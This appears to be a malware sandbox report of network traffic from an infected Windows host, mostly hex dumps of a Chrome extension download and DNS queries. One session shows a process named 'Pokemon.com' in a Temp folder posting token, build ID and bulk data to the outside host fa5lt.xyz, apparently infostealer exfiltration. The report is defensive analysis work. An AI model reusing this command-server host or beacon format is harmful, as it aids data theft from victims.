                                                                                                                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7tH5ZzJMfNfa9BIZr8250lXMXmPl3ep-Vo_9n3cA_0tj0h-vy5u0X0e4GXYF7rzyXp
                                                                                                                                                                                                                                                                                    X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                                                                                                                    Date: Thu, 26 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                    Expires: Fri, 26 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                    Age: 78547
                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                    ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                    Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                    Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                                    Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                                    Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                                    Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                                    Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                    Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                    Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                    Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                    Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                    Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    23192.168.2.549914172.64.41.34434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    24192.168.2.549912172.64.41.34434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    25192.168.2.549913172.64.41.34434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:21 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    26192.168.2.549929116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----PPHDJW4O89RIM790ZMO8
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 262605
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 50 50 48 44 4a 57 34 4f 38 39 52 49 4d 37 39 30 5a 4d 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 50 50 48 44 4a 57 34 4f 38 39 52 49 4d 37 39 30 5a 4d 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 50 50 48 44 4a 57 34 4f 38 39 52 49 4d 37 39 30 5a 4d 4f 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------PPHDJW4O89RIM790ZMO8Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------PPHDJW4O89RIM790ZMO8Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------PPHDJW4O89RIM790ZMO8Cont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
